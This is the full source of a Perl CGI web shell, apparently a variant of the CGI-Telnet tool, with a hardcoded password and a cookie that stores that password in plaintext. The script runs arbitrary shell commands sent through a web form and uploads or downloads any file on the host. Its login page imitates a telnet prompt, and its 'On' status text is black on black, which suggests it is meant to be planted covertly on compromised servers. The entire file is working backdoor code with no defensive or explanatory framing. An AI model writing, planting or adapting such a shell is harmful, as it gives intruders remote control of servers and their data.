cgi

1. #!/usr/bin/perl -I/usr/local/bandmain
2. $Password = "mathio3";
3. $WinNT = 0;
4. $NTCmdSep = "&";
5. $UnixCmdSep = ";";
6. $CommandTimeoutDuration = 10;
7. $ShowDynamicOutput = 1;
8. $CmdSep = ($WinNT ? $NTCmdSep : $UnixCmdSep);
9. $CmdPwd = ($WinNT ? "cd" : "pwd");
10. $PathSep = ($WinNT ? "\\" : "/");
11. $Redirector = ($WinNT ? " 2>&1 1>&2" : " 1>&1 2>&1");
12. sub ReadParse
13. {
14. local (*in) = @_ if @_;
15. local ($i, $loc, $key, $val);
16.  
17. $MultipartFormData = $ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/;
18.  
19. if($ENV{'REQUEST_METHOD'} eq "GET")
20. {
21. $in = $ENV{'QUERY_STRING'};
22. }
23. elsif($ENV{'REQUEST_METHOD'} eq "POST")
24. {
25. binmode(STDIN) if $MultipartFormData & $WinNT;
26. read(STDIN, $in, $ENV{'CONTENT_LENGTH'});
27. }
28.  
29. # handle file upload data
30. if($ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/)
31. {
32. $Boundary = '--'.$1; # please refer to RFC1867
33. @list = split(/$Boundary/, $in);
34. $HeaderBody = $list[1];
35. $HeaderBody =~ /\r\n\r\n|\n\n/;
36. $Header = $`;
37. $Body = $';
38. $Body =~ s/\r\n$//; # the last \r\n was put in by Netscape
39. $in{'filedata'} = $Body;
40. $Header =~ /filename=\"(.+)\"/;
41. $in{'f'} = $1;
42. $in{'f'} =~ s/\"//g;
43. $in{'f'} =~ s/\s//g;
44.  
45. # parse trailer
46. for($i=2; $list[$i]; $i++)
47. {
48. $list[$i] =~ s/^.+name=$//;
49. $list[$i] =~ /\"(\w+)\"/;
50. $key = $1;
51. $val = $';
52. $val =~ s/(^(\r\n\r\n|\n\n))|(\r\n$|\n$)//g;
53. $val =~ s/%(..)/pack("c", hex($1))/ge;
54. $in{$key} = $val;
55. }
56. }
57. else # standard post data (url encoded, not multipart)
58. {
59. @in = split(/&/, $in);
60. foreach $i (0 .. $#in)
61. {
62. $in[$i] =~ s/\+/ /g;
63. ($key, $val) = split(/=/, $in[$i], 2);
64. $key =~ s/%(..)/pack("c", hex($1))/ge;
65. $val =~ s/%(..)/pack("c", hex($1))/ge;
66. $in{$key} .= "\0" if (defined($in{$key}));
67. $in{$key} .= $val;
68. }
69. }
70. }
71.  
72. sub PrintPageHeader
73. {
74. $EncodedCurrentDir = $CurrentDir;
75. $EncodedCurrentDir =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
76. print "Content-type: text/html\n\n";
77. print <<END;
78. <html>
79. <head>
80. <title></title>
81. $HtmlMetaHeader
82. </head>
83. <body onLoad="document.f.@_.focus()" bgcolor="#FFFFFF" topmargin="0" leftmargin="0" marginwidth="0" marginheight="0" text="#FF0000">
84. <table border="1" width="100%" cellspacing="0" cellpadding="2">
85. <tr>
86. <td bgcolor="#FFFFFF" bordercolor="#FFFFFF" align="center" width="1%">
87. <b><font size="2">#</font></b></td>
88. <td bgcolor="#FFFFFF" width="98%"><font face="Verdana" size="2"><b>
89. <b style="color:black;background-color:black">On</b> Connected to $ServerName</b></font></td>
90. </tr>
91. <tr>
92. <td colspan="2" bgcolor="#FFFFFF"><font face="Verdana" size="2">
93.  
94. <a href="$ScriptLocation?a=upload&d=$EncodedCurrentDir"><font color="#FF0000">Upload File</font></a> |
95. <a href="$ScriptLocation?a=download&d=$EncodedCurrentDir"><font color="#FF0000">Download File</font></a> |
96. <a href="$ScriptLocation?a=logout"><font color="#FF0000">Disconnect</font></a> |
97. </font></td>
98. </tr>
99. </table>
100. <font size="3">
101. END
102. }
103. sub PrintLoginScreen
104. {
105. $Message = q$</font><h1>
106. $;
107. #'
108. print <<END;
109. <code>
110.  
111. Trying $ServerName...<br>
112. Connected to $ServerName<br>
113. Escape character is ^]
114. <code>$Message
115. END
116. }
117. sub PrintLoginFailedMessage
118. {
119. print <<END;
120. <code>
121. password:<br>
122. Login incorrect<br><br>
123. </code>
124. END
125. }
126. sub PrintLoginForm
127. {
128. print <<END;
129. <code>
130.  
131. <form name="f" method="POST" action="$ScriptLocation">
132. <input type="hidden" name="a" value="login">
133. </font>
134. <font size="3">
135. id:</font><font color="#009900" size="3"><input type="password" name="p">
136. <input type="submit" value="Enter">
137. </form>
138. </code>
139. END
140. }
141.  
142. sub PrintPageFooter
143. {
144. print "</font></body></html>";
145. }
146. sub GetCookies
147. {
148. @httpcookies = split(/; /,$ENV{'HTTP_COOKIE'});
149. foreach $cookie(@httpcookies)
150. {
151. ($id, $val) = split(/=/, $cookie);
152. $Cookies{$id} = $val;
153. }
154. }
155.  
156. sub PrintLogoutScreen
157. {
158. print "<code>Connection closed by foreign host.<br><br></code>";
159. }
160. sub PerformLogout
161. {
162. print "Set-Cookie: SAVEDPWD=;\n"; # remove password cookie
163. &PrintPageHeader("p");
164. &PrintLogoutScreen;
165.  
166. &PrintLoginScreen;
167. &PrintLoginForm;
168. &PrintPageFooter;
169. }
170. sub PerformLogin
171. {
172. if($LoginPassword eq $Password) # password matched
173. {
174. print "Set-Cookie: SAVEDPWD=$LoginPassword;\n";
175. &PrintPageHeader("c");
176. &PrintCommandLineInputForm;
177. &PrintPageFooter;
178. }
179. else # password didn't match
180. {
181. &PrintPageHeader("p");
182. &PrintLoginScreen;
183. if($LoginPassword ne "") # some password was entered
184. {
185. &PrintLoginFailedMessage;
186.  
187. }
188. &PrintLoginForm;
189. &PrintPageFooter;
190. }
191. }
192. sub PrintCommandLineInputForm
193. {
194. $Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
195. print <<END;
196. <code>
197. <form name="f" method="POST" action="$ScriptLocation">
198. <input type="hidden" name="a" value="command">
199. <input type="hidden" name="d" value="$CurrentDir">
200. $Prompt
201. <input type="text" name="c">
202. <input type="submit" value="Enter">
203. </form>
204. </code>
205.  
206. END
207. }
208. sub PrintFileDownloadForm
209. {
210. $Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
211. print <<END;
212. <code>
213. <form name="f" method="POST" action="$ScriptLocation">
214. <input type="hidden" name="d" value="$CurrentDir">
215. <input type="hidden" name="a" value="download">
216. $Prompt download<br><br>
217. Filename: <input type="text" name="f" size="35"><br><br>
218. Download: <input type="submit" value="Begin">
219. </form>
220. </code>
221. END
222. }
223. sub PrintFileUploadForm
224. {
225. $Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
226. print <<END;
227. <code>
228.  
229. <form name="f" enctype="multipart/form-data" method="POST" action="$ScriptLocation">
230. $Prompt upload<br><br>
231. Filename: <input type="file" name="f" size="35"><br><br>
232. Options: &nbsp;<input type="checkbox" name="o" value="overwrite">
233. Overwrite if it Exists<br><br>
234. Upload:&nbsp;&nbsp;&nbsp;<input type="submit" value="Begin">
235. <input type="hidden" name="d" value="$CurrentDir">
236. <input type="hidden" name="a" value="upload">
237. </form>
238. </code>
239. END
240. }
241.  
242. sub CommandTimeout
243. {
244. if(!$WinNT)
245. {
246. alarm(0);
247. print <<END;
248. </xmp>
249.  
250. <code>
251. Command exceeded maximum time of $CommandTimeoutDuration second(s).
252. <br>Killed it!
253. END
254. &PrintCommandLineInputForm;
255. &PrintPageFooter;
256. exit;
257. }
258. }
259.  
260. sub ExecuteCommand
261. {
262. if($RunCommand =~ m/^\s*cd\s+(.+)/) # it is a change dir command
263. {
264.  
265.  
266. $OldDir = $CurrentDir;
267. $Command = "cd \"$CurrentDir\"".$CmdSep."cd $1".$CmdSep.$CmdPwd;
268. chop($CurrentDir = `$Command`);
269. &PrintPageHeader("c");
270. $Prompt = $WinNT ? "$OldDir> " : "[admin\@$ServerName $OldDir]\$ ";
271. print "$Prompt $RunCommand";
272. }
273. else # some other command, display the output
274. {
275. &PrintPageHeader("c");
276. $Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
277. print "$Prompt $RunCommand<xmp>";
278. $Command = "cd \"$CurrentDir\"".$CmdSep.$RunCommand.$Redirector;
279. if(!$WinNT)
280. {
281. $SIG{'ALRM'} = \&CommandTimeout;
282. alarm($CommandTimeoutDuration);
283. }
284. if($ShowDynamicOutput) # show output as it is generated
285. {
286. $|=1;
287. $Command .= " |";
288. open(CommandOutput, $Command);
289. while(<CommandOutput>)
290. {
291. $_ =~ s/(\n|\r\n)$//;
292. print "$_\n";
293. }
294. $|=0;
295. }
296. else # show output after command completes
297. {
298. print `$Command`;
299. }
300. if(!$WinNT)
301. {
302. alarm(0);
303. }
304. print "</xmp>";
305. }
306. &PrintCommandLineInputForm;
307. &PrintPageFooter;
308. }
309.  
310. sub PrintDownloadLinkPage
311. {
312. local($FileUrl) = @_;
313. if(-e $FileUrl) # if the file exists
314. {
315. # encode the file link so we can send it to the browser
316. $FileUrl =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
317. $DownloadLink = "$ScriptLocation?a=download&f=$FileUrl&o=go";
318. $HtmlMetaHeader = "<meta HTTP-EQUIV=\"Refresh\" CONTENT=\"1; URL=$DownloadLink\">";
319. &PrintPageHeader("c");
320. print <<END;
321. <code>
322.  
323. Sending File $TransferFile...<br>
324. If the download does not start automatically,
325. <a href="$DownloadLink">Click Here</a>.
326. END
327. &PrintCommandLineInputForm;
328. &PrintPageFooter;
329. }
330. else # file doesn't exist
331. {
332. &PrintPageHeader("f");
333. print "Failed to download $FileUrl: $!";
334. &PrintFileDownloadForm;
335. &PrintPageFooter;
336. }
337. }
338.  
339. sub SendFileToBrowser
340. {
341. local($SendFile) = @_;
342. if(open(SENDFILE, $SendFile)) # file opened for reading
343. {
344. if($WinNT)
345. {
346. binmode(SENDFILE);
347. binmode(STDOUT);
348. }
349. $FileSize = (stat($SendFile))[7];
350. ($Filename = $SendFile) =~ m!([^/^\\]*)$!;
351. print "Content-Type: application/x-unknown\n";
352. print "Content-Length: $FileSize\n";
353. print "Content-Disposition: attachment; filename=$1\n\n";
354. print while(<SENDFILE>);
355. close(SENDFILE);
356. }
357. else # failed to open file
358. {
359. &PrintPageHeader("f");
360. print "Failed to download $SendFile: $!";
361. &PrintFileDownloadForm;
362.  
363. &PrintPageFooter;
364. }
365. }
366.  
367.  
368.  
369. sub BeginDownload
370. {
371. # get fully qualified path of the file to be downloaded
372. if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) |
373. (!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
374. {
375. $TargetFile = $TransferFile;
376. }
377. else # path is relative
378. {
379. chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
380. $TargetFile .= $PathSep.$TransferFile;
381. }
382.  
383. if($Options eq "go") # we have to send the file
384. {
385. &SendFileToBrowser($TargetFile);
386. }
387. else # we have to send only the link page
388. {
389. &PrintDownloadLinkPage($TargetFile);
390. }
391. }
392.  
393. #------------------------------------------------------------------------------
394. # This function is called when the user wants to upload a file. If the
395. # file is not specified, it displays a form allowing the user to specify a
396. # file, otherwise it starts the upload process.
397. #------------------------------------------------------------------------------
398. sub UploadFile
399. {
400. # if no file is specified, print the upload form again
401. if($TransferFile eq "")
402. {
403. &PrintPageHeader("f");
404. &PrintFileUploadForm;
405. &PrintPageFooter;
406. return;
407. }
408. &PrintPageHeader("c");
409.  
410. # start the uploading process
411. print "Uploading $TransferFile to $CurrentDir...<br>";
412.  
413. # get the fullly qualified pathname of the file to be created
414. chop($TargetName) if ($TargetName = $CurrentDir) =~ m/[\\\/]$/;
415. $TransferFile =~ m!([^/^\\]*)$!;
416. $TargetName .= $PathSep.$1;
417.  
418. $TargetFileSize = length($in{'filedata'});
419. # if the file exists and we are not supposed to overwrite it
420. if(-e $TargetName && $Options ne "overwrite")
421. {
422. print "Failed: Destination file already exists.<br>";
423. }
424. else # file is not present
425. {
426. if(open(UPLOADFILE, ">$TargetName"))
427. {
428. binmode(UPLOADFILE) if $WinNT;
429. print UPLOADFILE $in{'filedata'};
430. close(UPLOADFILE);
431. print "Transfered $TargetFileSize Bytes.<br>";
432. print "File Path: $TargetName<br>";
433. }
434. else
435. {
436. print "Failed: $!<br>";
437. }
438. }
439. print "";
440. &PrintCommandLineInputForm;
441.  
442. &PrintPageFooter;
443. }
444.  
445.  
446. sub DownloadFile
447. {
448. # if no file is specified, print the download form again
449. if($TransferFile eq "")
450. {
451. &PrintPageHeader("f");
452. &PrintFileDownloadForm;
453. &PrintPageFooter;
454. return;
455. }
456.  
457. # get fully qualified path of the file to be downloaded
458. if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) |
459. (!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
460. {
461. $TargetFile = $TransferFile;
462. }
463. else # path is relative
464. {
465. chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
466. $TargetFile .= $PathSep.$TransferFile;
467. }
468.  
469. if($Options eq "go") # we have to send the file
470. {
471. &SendFileToBrowser($TargetFile);
472. }
473. else # we have to send only the link page
474. {
475. &PrintDownloadLinkPage($TargetFile);
476. }
477. }
478.  
479. &ReadParse;
480. &GetCookies;
481.  
482. $ScriptLocation = $ENV{'SCRIPT_NAME'};
483. $ServerName = $ENV{'SERVER_NAME'};
484. $LoginPassword = $in{'p'};
485. $RunCommand = $in{'c'};
486. $TransferFile = $in{'f'};
487. $Options = $in{'o'};
488.  
489. $Action = $in{'a'};
490. $Action = "login" if($Action eq ""); # no action specified, use default
491.  
492. # get the directory in which the commands will be executed
493. $CurrentDir = $in{'d'};
494. chop($CurrentDir = `$CmdPwd`) if($CurrentDir eq "");
495.  
496. $LoggedIn = $Cookies{'SAVEDPWD'} eq $Password;
497.  
498. if($Action eq "login" || !$LoggedIn) # user needs/has to login
499. {
500. &PerformLogin;
501.  
502. }
503. elsif($Action eq "command") # user wants to run a command
504. {
505. &ExecuteCommand;
506. }
507. elsif($Action eq "upload") # user wants to upload a file
508. {
509. &UploadFile;
510. }
511. elsif($Action eq "download") # user wants to download a file
512. {
513. &DownloadFile;
514. }
515. elsif($Action eq "logout") # user wants to logout
516. {
517. &PerformLogout;
518. }